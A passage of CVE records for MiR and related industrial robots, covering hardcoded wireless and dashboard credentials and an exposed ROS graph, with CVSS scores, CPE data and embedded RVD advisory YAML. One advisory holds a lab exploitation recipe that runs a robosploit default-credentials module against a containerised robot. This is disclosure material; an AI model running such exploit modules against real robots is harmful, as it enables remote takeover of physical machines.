"vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF0E5CFB-6C15-4BB1-97D8-DD52F68190DD", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "472A560B-547D-4C9F-BE86-ED602FA32799", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-flex_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D5528AFD-75DF-4296-9A29-4BD00AB76273", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "654488E4-161E-40B5-9E0B-BE68F5F38E91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-one_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD6E62F4-9C15-49AA-BFB7-81443D40B9B9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB77317-78C0-4800-8E1D-498979B6CB06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_robots_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7452D74-36A5-4C87-AA20-8E9A80724EAA", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd_robots:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FD4ACEB-1184-47AB-86E4-732DA183E8AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "798" ]
798
https://github.com/aliasrobotics/RVD/issues/2566
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2566 title: 'RVD#2566: Hardcoded Credentials on MiRX00 wireless Access Point' type: vulnerability description: One of the wireless interfaces within MiR100, MiR200 and possibly (according to the vendor) other MiR fleet vehicles comes pre-configured in WiFi Master (Access Point) mode. Credentials to such wireless Access Point default to well known and widely spread SSID (MiR_RXXXX) and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. We have confirmed this flaw in MiR100 and MiR200 but it might also apply to MiR250, MiR500 and MiR1000. cwe: CWE-798 cve: CVE-2020-10269 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD, Autentication system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 9.8 rvss-vector: RVSS:1.0/AV:AN/AC:H/PR:L/UI:N/Y:Z/S:U/C:H/I:H/A:H/H:HU severity-description: Critical cvss-score: 9.8 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H links: - https://cwe.mitre.org/data/definitions/798.html - https://www.mobile-industrial-robots.com/media/2714/mir100-user-guide_robot-interface-20-v10.pdf - http://bernharddieber.com/publication/taurer2019mirsafety - https://github.com/aliasrobotics/RVD/issues/2566 flaw: phase: testing specificity: general-issue architectural-location: Platform code application: All subsystem: UI:Login package: N/A languages: None date-detected: 2019-07-01 detected-by: Bernhard Dieber (Joanneum Research), Alias Robotics (https://aliasrobotics.com/) detected-by-method: testing dynamic, web browser. date-reported: '2020-06-24' reported-by: "Alias Robotics (https://aliasrobotics.com/), further edited by Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2566 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2566: Hardcoded Credentials on MiRX00 wireless Access Point
https://api.github.com/repos/aliasrobotics/RVD/issues/2566/comments
0
2020-06-24T04:59:00Z
2020-07-10T06:38:08Z
https://github.com/aliasrobotics/RVD/issues/2566
644,318,586
2,566
1,308
CVE-2020-10270
2020-06-24T05:15:12.753
Out of the wired and wireless interfaces within MiR100, MiR200 and other vehicles from the MiR fleet, it's possible to access the Control Dashboard on a hardcoded IP address. Credentials to such wireless interface default to well known and widely spread users (omitted) and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. This flaw allows cyber attackers to take control of the robot remotely and make use of the default user interfaces MiR has created, lowering the complexity of attacks and making them available to entry-level attackers. More elaborated attacks can also be established by clearing authentication and sending network requests directly. We have confirmed this flaw in MiR100 and MiR200 but according to the vendor, it might also apply to MiR250, MiR500 and MiR1000.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2557" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2557" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDEDA2D-26AB-4F23-B672-D0C89A7BEFB9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0989373-02AB-4E05-BAC2-0522A641D73A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "78E261B1-C56F-4428-9D53-5BBCCACEAFCF", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BF40B1F-0DD2-4B8A-BFBA-A7E641DC3316", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir250_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "877EEDC4-E86F-420D-81C6-3F632C787003", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1AE2A0-D83D-441B-856B-7E6FAB065C0D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "335CA5FE-5AFD-4D49-9A88-1CD71C9281BE", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F57611E0-5CB2-40FD-8420-ED13A1C4863F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6865A559-8CA9-4F51-AC43-35BDF5201B91", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "04043B16-E401-4D2C-9812-71923CEA2716", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robotics:er200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "39BD42AA-95E1-4A02-BB9D-C54AE6BAF9B2", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D8A47E5E-7754-47EA-B02D-8A7F54124ED4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF0E5CFB-6C15-4BB1-97D8-DD52F68190DD", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "472A560B-547D-4C9F-BE86-ED602FA32799", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-flex_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D5528AFD-75DF-4296-9A29-4BD00AB76273", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "654488E4-161E-40B5-9E0B-BE68F5F38E91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-one_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD6E62F4-9C15-49AA-BFB7-81443D40B9B9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB77317-78C0-4800-8E1D-498979B6CB06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_robots_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7452D74-36A5-4C87-AA20-8E9A80724EAA", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd_robots:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FD4ACEB-1184-47AB-86E4-732DA183E8AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "798" ]
798
https://github.com/aliasrobotics/RVD/issues/2557
[ "Exploit", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2557 title: 'RVD#2557: Hardcoded Credentials on MiRX00 Control Dashboard' type: vulnerability description: Out of the wired and wireless interfaces within MiR100, MiR200 and other vehicles from the MiR fleet, it's possible to access the Control Dashboard on a hardcoded IP address. Credentials to such wireless interface default to well known and widely spread users (omitted) and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. This flaw allows cyber attackers to take control of the robot remotely and make use of the default user interfaces MiR has created, lowering the complexity of attacks and making them available to entry-level attackers. More elaborated attacks can also be established by clearing authentication and sending network requests directly. We have confirmed this flaw in MiR100 and MiR200 but according to the vendor, it might also apply to MiR250, MiR500 and MiR1000. cwe: CWE-798 cve: CVE-2020-10270 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD, Autentication system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 10.0 rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:L/UI:N/Y:Z/S:U/C:H/I:H/A:H/H:H severity-description: Critical cvss-score: 9.8 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H links: - https://cwe.mitre.org/data/definitions/798.html - https://www.mobile-industrial-robots.com/media/2714/mir100-user-guide_robot-interface-20-v10.pdf - http://bernharddieber.com/publication/taurer2019mirsafety - https://github.com/aliasrobotics/RVD/issues/2557 flaw: phase: runtime-operation specificity: general-issue architectural-location: Platform code application: All subsystem: UI:Login package: N/A languages: None date-detected: 2019-07-01 detected-by: Alias Robotics (https://aliasrobotics.com/) detected-by-method: testing dynamic, web browser. date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2557 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: networks: - network: - driver: overlay - name: mireth-network - encryption: false containers: - container: - name: mir100 - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/robo_mir100:2.8.1.1 - network: mireth-network - container: - name: attacker - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/comp_ros:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/expl_robosploit/expl_robosploit:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_nmap:latest - network: mireth-network flow: - container: - name: attacker - window: - name: attacker - commands: - command: 'export TARGET=$(nslookup mir100 | awk "NR==6{print$2}" | sed "s/Address: //g")' - command: echo "Waiting until the dashboard launches..."; sleep 10 - command: 'robosploit -m exploits/mir/dashboard/http_default_creds -s "target $TARGET" ' - container: - name: mir100 - window: - name: setup - commands: - command: mkdir /var/run/sshd - command: /usr/sbin/sshd - command: /bin/sleep 5 - command: sudo mkdir /run/lock - command: /etc/init.d/apache2 start - split: horizontal - command: /bin/sleep 2 - command: python /usr/local/mir/software/robot/release/db_backup.py - command: /etc/init.d/mysql start - command: /bin/sleep 2 - command: /usr/sbin/mysqld --verbose & - window: - name: ros - commands: - command: python /usr/local/mir/software/robot/release/db_backup.py - command: sudo apt-key adv --keyserver 'hkp://keyserver.ubuntu.com:80' --recv-key C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654 - command: sudo apt-get update - command: roslaunch mirCommon mir_bringup.launch - select: setup - attach: attacker mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2557: Hardcoded Credentials on MiRX00 Control Dashboard
https://api.github.com/repos/aliasrobotics/RVD/issues/2557/comments
0
2020-06-24T04:43:23Z
2020-07-10T06:38:05Z
https://github.com/aliasrobotics/RVD/issues/2557
644,313,367
2,557
1,309
CVE-2020-10271
2020-06-24T05:15:12.847
MiR100, MiR200 and other MiR robots use the Robot Operating System (ROS) default packages exposing the computational graph to all network interfaces, wireless and wired. This is the result of a bad set up and can be mitigated by appropriately configuring ROS and/or applying custom patches as appropriate. Currently, the ROS computational graph can be accessed fully from the wired exposed ports. In combination with other flaws such as CVE-2020-10269, the computation graph can also be fetched and interacted from wireless networks. This allows a malicious operator to take control of the ROS logic and correspondingly, the complete robot given that MiR's operations are centered around the framework (ROS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 6, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2555" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2555" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDEDA2D-26AB-4F23-B672-D0C89A7BEFB9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0989373-02AB-4E05-BAC2-0522A641D73A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "78E261B1-C56F-4428-9D53-5BBCCACEAFCF", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BF40B1F-0DD2-4B8A-BFBA-A7E641DC3316", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir250_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "877EEDC4-E86F-420D-81C6-3F632C787003", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1AE2A0-D83D-441B-856B-7E6FAB065C0D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "335CA5FE-5AFD-4D49-9A88-1CD71C9281BE", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F57611E0-5CB2-40FD-8420-ED13A1C4863F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6865A559-8CA9-4F51-AC43-35BDF5201B91", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "04043B16-E401-4D2C-9812-71923CEA2716", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robotics:er200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "39BD42AA-95E1-4A02-BB9D-C54AE6BAF9B2", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D8A47E5E-7754-47EA-B02D-8A7F54124ED4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF0E5CFB-6C15-4BB1-97D8-DD52F68190DD", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "472A560B-547D-4C9F-BE86-ED602FA32799", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-flex_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D5528AFD-75DF-4296-9A29-4BD00AB76273", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "654488E4-161E-40B5-9E0B-BE68F5F38E91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-one_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD6E62F4-9C15-49AA-BFB7-81443D40B9B9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB77317-78C0-4800-8E1D-498979B6CB06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_robots_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7452D74-36A5-4C87-AA20-8E9A80724EAA", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd_robots:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FD4ACEB-1184-47AB-86E4-732DA183E8AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "668" ]
668
https://github.com/aliasrobotics/RVD/issues/2555
[ "Exploit", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
